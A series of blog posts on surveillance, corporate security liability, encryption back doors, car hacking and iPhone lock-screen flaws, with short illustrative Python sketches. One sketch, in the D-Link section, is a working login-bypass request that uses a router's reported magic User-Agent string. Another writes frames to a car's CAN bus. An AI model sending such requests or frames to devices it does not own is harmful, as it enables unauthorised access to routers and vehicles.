Living with the surveillance state

A point well made by Bill Keller in a thoughtful column:

The danger, it seems to me, is not surveillance per se. We have already decided, most of us, that life on the grid entails a certain amount of intrusion. Nor is the danger secrecy, which, as Posner notes, “is ubiquitous in a range of uncontroversial settings,” a promise the government makes to protect “taxpayers, inventors, whistle-blowers, informers, hospital patients, foreign diplomats, entrepreneurs, contractors, data suppliers and many others.”

The danger is the absence of rigorous, independent regulation and vigilant oversight to keep potential abuses of power from becoming a real menace to our freedom. The founders created a system of checks and balances, but the safeguards have not kept up with technology. Instead, we have an executive branch in a leak-hunting frenzy, a Congress that treats oversight as a form of partisan combat, a political climate that has made “regulation” an expletive and a public that feels a generalized, impotent uneasiness. I don’t think we’re on a slippery slope to a police state, but I think if we are too complacent about our civil liberties we could wake up one day and find them gone — not in a flash of nuclear terror but in a gradual, incremental surrender.

Let’s turn the TalkTalk hacking scandal into a crisis

Yesterday’s Observer column:

The political theorist David Runciman draws a useful distinction between scandals and crises. Scandals happen all the time in society; they create a good deal of noise and heat, but in the end nothing much happens. Things go back to normal. Crises, on the other hand, do eventually lead to structural change, and in that sense play an important role in democracies.

So a good question to ask whenever something bad happens is whether it heralds a scandal or a crisis. When the phone-hacking story eventually broke, for example, many people (me included) thought that it represented a crisis. Now, several years – and a judicial enquiry – later, nothing much seems to have changed. Sure, there was a lot of sound and fury, but it signified little. The tabloids are still doing their disgraceful thing, and Rebekah Brooks is back in the saddle. So it was just a scandal, after all.

When the TalkTalk hacking story broke and I heard the company’s chief executive say in a live radio interview that she couldn’t say whether the customer data that had allegedly been stolen had been stored in encrypted form, the Runciman question sprang immediately to mind. That the boss of a communications firm should be so ignorant about something so central to her business certainly sounded like a scandal…

Read on

LATER: Interesting blog post by Bruce Schneier. He opens with an account of how the CIA’s Director and the software developer Grant Blakeman had their email accounts hacked. Then,

Neither of them should have been put through this. None of us should have to worry about this.

The problem is a system that makes this possible, and companies that don’t care because they don’t suffer the losses. It’s a classic market failure, and government intervention is how we have to fix the problem.

It’s only when the costs of insecurity exceed the costs of doing it right that companies will invest properly in our security. Companies need to be responsible for the personal information they store about us. They need to secure it better, and they need to suffer penalties if they improperly release it. This means regulatory security standards.

The government should not mandate how a company secures our data; that will move the responsibility to the government and stifle innovation. Instead, government should establish minimum standards for results, and let the market figure out how to do it most effectively. It should allow individuals whose information has been exposed to sue for damages. This is a model that has worked in all other aspects of public safety, and it needs to be applied here as well.

He’s right. Only when the costs of insecurity exceed the costs of doing it right will companies invest properly in it. And governments can fix that, quickly, by changing the law. For once, this is something that’s not difficult to do, even in a democracy.
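A back-of-the-envelope calculation makes the incentive problem concrete. The figures below are invented purely for illustration: as long as the expected loss the company itself bears from a breach is smaller than the cost of doing security properly, under-investment is the “rational” choice, and liability for customers’ losses is what changes that arithmetic.

```python
# Toy model of Schneier's market-failure argument. All figures are invented.
breach_probability = 0.05            # chance of a serious breach in a given year
cost_borne_by_company = 2_000_000    # clean-up and fines the company itself pays today
cost_of_doing_it_right = 500_000     # a proper security programme

expected_loss = breach_probability * cost_borne_by_company
print(expected_loss)                 # 100,000 < 500,000: under-investing looks "rational"

# Liability changes the sums: let exposed customers sue for the harm done to them.
harm_to_customers = 20_000_000
expected_loss_with_liability = breach_probability * (cost_borne_by_company + harm_to_customers)
print(expected_loss_with_liability)  # 1,100,000 > 500,000: now security pays for itself
```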

So even Apple can’t break into my iPhone?

Hmmm… I wonder. This from SiliconBeat:

Apple says it would be burdensome — and mostly impossible — for it to unlock people’s iPhones upon the request of law enforcement.

In a legal filing this week, the iPhone maker answered a question posed by U.S. Magistrate Judge James Orenstein, who had been urged by federal prosecutors to force Apple to unlock an iPhone. Orenstein said last week that he would defer ruling until Apple let him know whether it’s feasible to bypass an iPhone’s passcode.

Here’s the meat of Apple’s response, which comes amid law enforcement officials’ growing frustration over tech companies’ increased privacy and security efforts:

“In most cases now and in the future, the government’s requested order would be substantially burdensome, as it would be impossible to perform. For devices running iOS 8 or higher, Apple would not have the technical ability to do what the government requests—take possession of a password protected device from the government and extract unencrypted user data from that device for the government. Among the security features in iOS 8 is a feature that prevents anyone without the device’s passcode from accessing the device’s encrypted data. This includes Apple.”
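What Apple is describing is, in essence, a key-derivation design: the key that protects user data is derived from both the user’s passcode and a secret fused into the device’s hardware, so nobody who lacks the passcode, Apple included, can reconstruct the key, and passcode guesses cannot be farmed out to faster machines. Here is a minimal sketch of that idea; it is illustrative only, not Apple’s actual implementation.

```python
import hashlib
import os

# Illustrative sketch only; NOT Apple's actual implementation.
# The data-protection key depends on BOTH the user's passcode and a per-device
# secret that never leaves the hardware, so neither the manufacturer nor anyone
# holding the device can derive the key without the passcode, and brute-force
# guessing has to run on the (rate-limited) device itself.

hardware_uid = os.urandom(32)   # stands in for the unique key fused into the chip
passcode = b"1234"              # whatever the user types at the lock screen

# A deliberately slow, salted derivation makes off-device guessing impractical.
data_protection_key = hashlib.pbkdf2_hmac("sha256", passcode, hardware_uid, 200_000)
print(data_protection_key.hex())
```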

Want to network your Jeep Cherokee? Try smoke signals: they’re safer

This morning’s Observer column:

‘‘Jeep Cherokee hacked in demo; Chrysler owners urged to download patch”, was the heading on an interesting story last week. “Just imagine,” burbled the report, “one moment you’re listening to some pleasant pop hits on the radio, and the next moment the hip-hop station is blasting at full volume – and you can’t change it back! This is just one of the exploits of Charlie Miller and Chris Valasek … when they hacked into a Jeep Cherokee. They were able to change the temperature of the air conditioning, turn on the windshield wipers and blast the wiper fluid to blur the glass, and even disable the brakes, turn off the transmission, take control of the steering, and display their faces onto the dashboard’s screen.”

In some ways, this was an old story: cars have been largely governed by electronics since the 1980s, and anyone who controls the electronics controls the car. But up to now, the electronics have not been connected to the internet. What makes the Jeep Cherokee story interesting is that its electronics were hacked via the internet. And that was possible because internet connectivity now comes as a consumer option – Uconnect – from Chrysler.

If at this point you experience a sinking feeling, then join the club. So let us return to first principles for a moment…

Read on
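To make the column’s point concrete: once an attacker reaches the vehicle’s internal network, the controls are just frames on a CAN bus, and writing one takes a few lines of code. The sketch below uses the python-can library on a Linux socketcan interface; the interface name, message ID and payload are invented for illustration, since real ones vary from model to model.

```python
import can  # python-can library

# Hypothetical sketch: whoever can put frames on the in-vehicle CAN bus
# controls the electronics. All identifiers below are made up.
bus = can.interface.Bus(channel="can0", bustype="socketcan")

frame = can.Message(
    arbitration_id=0x2E0,            # invented ID standing in for, say, a wiper command
    data=[0x01, 0x00, 0x00, 0x00],   # invented payload
    is_extended_id=False,
)
bus.send(frame)
```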

LATER: Chrysler has issued a recall for 1.4 million vehicles as a result of the hacking revelations.

Common sense about hacking

From the Economist blog:

For companies, there are two strategies for dealing with people who uncover flaws in their IT security: a right way and a wrong way. Our leader on hacking this week tells of the approach that Volkswagen took when a group of academics informed it that they had uncovered a vulnerability in a remote-car-key system: the firm slapped a court injunction on them. It is difficult to conceive of an approach more likely to be counter-productive.

United Airlines, it seems, has a far more enlightened attitude. It has just awarded two hackers 1m air miles each after they managed to spot security weak spots in its website. The move is part of a scheme called “bug bounty”, in which hackers are incentivised to contact the company with security flaws, rather than post them online. This approach is common at Silicon Valley firms, and makes just as much sense for old-fashioned industries too. Pound to a penny, there are nefarious types out there trying to break into most big companies’ IT systems. Encouraging “white-hat” hackers to uncover flaws, and then rewarding them for not revealing them to the wider world, may sit uncomfortably with people’s sense of fairness. However, if it gives firms time to fix the problem, in pragmatic terms the benefit is obvious.

Yep.

Old cryptopanic in new iBottles

Repeat after me:

A ‘backdoor’ for law enforcement is a deliberately introduced security vulnerability, a form of architected breach.

Or, if you’d like the more sophisticated version:

It requires a system to be designed to permit access to a user’s data against the user’s wishes, and such a system is necessarily less secure than one designed without such a feature. As computer scientist Matthew Green explains in a recent Slate column (and, with several eminent colleagues, in a longer 2013 paper) it is damn near impossible to create a security vulnerability that can only be exploited by “the good guys.” Activist Eva Galperin puts the point pithily: “Once you build a back door, you rarely get to decide who walks through it.” Even if your noble intention is only to make criminals more vulnerable to police, the unavoidable cost of doing so in practice is making the overwhelming majority of law-abiding users more vulnerable to criminals.
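One way to see why an “architected breach” weakens the whole system is to sketch what exceptional access looks like in practice. In the hypothetical scheme below, written with Python’s cryptography library (the scheme is an assumption for illustration, not any real product’s design), every message key must also be wrapped for an escrow key, so whoever obtains that single private key, by theft, bribery or court order, can read everything ever sent.

```python
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Hypothetical "exceptional access" design, for illustration only.
recipient_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
escrow_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)  # held by "the good guys"

session_key = os.urandom(32)  # the symmetric key that actually encrypts the message

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# The session key is wrapped once for the intended recipient...
wrapped_for_recipient = recipient_key.public_key().encrypt(session_key, oaep)

# ...and, by mandate, once more for the escrow key. Anyone who ever obtains the
# escrow private key can recover every session key, and so every message.
wrapped_for_escrow = escrow_key.public_key().encrypt(session_key, oaep)
```

The second wrapping is the back door: there is no way to build it so that only the intended visitor can walk through it.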

Bruce Schneier’s next book

Title: Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World

Publisher: WW Norton

Publication date: March 9, 2015

Table of Contents

Part 1: The World We’re Creating
Chapter 1: Data as a By-Product of Computing
Chapter 2: Data as Surveillance
Chapter 3: Analyzing our Data
Chapter 4: The Business of Surveillance
Chapter 5: Government Surveillance and Control
Chapter 6: Consolidation of Institutional Surveillance

Part 2: What’s at Stake
Chapter 7: Political Liberty and Justice
Chapter 8: Commercial Fairness and Equality
Chapter 9: Business Competitiveness
Chapter 10: Privacy
Chapter 11: Security

Part 3: What to Do About It
Chapter 12: Principles
Chapter 13: Solutions for Government
Chapter 14: Solutions for Corporations
Chapter 15: Solutions for the Rest of Us
Chapter 16: Social Norms and the Big Data Trade-Off

Something to be pre-ordered, methinks.

Neoliberalism’s revolving door

Well, guess what? The former Head of the NSA has found a lucrative retirement deal.

As the four-star general in charge of U.S. digital defenses, Keith Alexander warned repeatedly that the financial industry was among the likely targets of a major attack. Now he’s selling the message directly to the banks.

Joining a crowded field of cyber-consultants, the former National Security Agency chief is pitching his services for as much as $1 million a month. The audience is receptive: Under pressure from regulators, lawmakers and their customers, financial firms are pouring hundreds of millions of dollars into barriers against digital assaults.

Alexander, who retired in March from his dual role as head of the NSA and the U.S. Cyber Command, has since met with the largest banking trade groups, stressing the threat from state-sponsored attacks bent on data destruction as well as hackers interested in stealing information or money.

“It would be devastating if one of our major banks was hit, because they’re so interconnected,” Alexander said in an interview.

Nice work if you can get it. First of all, you use your position in the state bureaucracy to scare the shit out of banks. Then you pitch your services as the guy who can help them escape Nemesis.

The US fears back-door routes into the net because it’s building them too

This morning’s Observer column:

At a remarkable conference held at the Aspen Institute in 2011, General Michael Hayden, a former head of both the NSA and the CIA, said something very interesting. In a discussion of how to secure the “critical infrastructure” of the United States he described the phenomenon of compromised computer hardware – namely, chips that have hidden “back doors” inserted into them at the design or manufacturing stage – as “the problem from hell”. And, he went on, “frankly, it’s not a problem that can be solved”.

Now General Hayden is an engaging, voluble, likable fellow. He’s popular with the hacking crowd because he doesn’t talk like a government suit. But sometimes one wonders if his agreeable persona is actually a front for something a bit more disingenuous. Earlier in the Aspen discussion, for example, he talked about the Stuxnet worm – which was used to destroy centrifuges in the Iranian nuclear programme – as something that was obviously created by a nation-state, but affected not to know that the US was one of the nation-states involved.

Given Hayden’s background and level of security clearance, it seems inconceivable that he didn’t know who built Stuxnet. So already one had begun to take his contributions with a modicum of salt. Nevertheless, his observation about the intractability of the problem of compromised hardware seemed incontrovertible…

Read on.

LATER: I came across this amazing piece of detective work, which uncovers a backdoor installed in some D-Link routers.
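For the curious, the flaw in that write-up reportedly boils down to a hard-coded bypass in the router’s web server: requests carrying a particular magic User-Agent string were let straight past the login check. Below is a minimal illustration of that class of backdoor; the router address is an assumption and the magic string is the one reported in the write-up, so test it only against hardware you own.

```python
import requests

ROUTER = "http://192.168.0.1"                # assumed address of a router you own
MAGIC_UA = "xmlset_roodkcableoj28840ybtide"  # the magic string reported in the write-up

# On affected firmware this request reportedly returned the admin interface
# without asking for a password; on patched devices it should not.
resp = requests.get(ROUTER + "/", headers={"User-Agent": MAGIC_UA}, timeout=5)
print(resp.status_code, len(resp.text))
```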

Why having a passcode might not protect your iPhone 5s from unauthorised use

Well, well. Alongside the discovery that the iPhone 5s fingerprint system isn’t quite as secure as advertised comes this.

If you have an iPhone 5 or older and have updated your operating system to Apple’s new iOS 7 version, you should be aware that the password (or “passcode”) required on your phone’s lock screen no longer prevents strangers from accessing your phone.

They can use Siri, the voice-command software, to bypass the password screen and access your phone, instead.

The good news is that distressed iPhone 5S owners can apparently foil this workaround by controlling access to Siri in the phone’s settings menu. The trail is: Settings > General > Passcode Lock [enter passcode] > Allow access when locked > Siri > switch from green to white.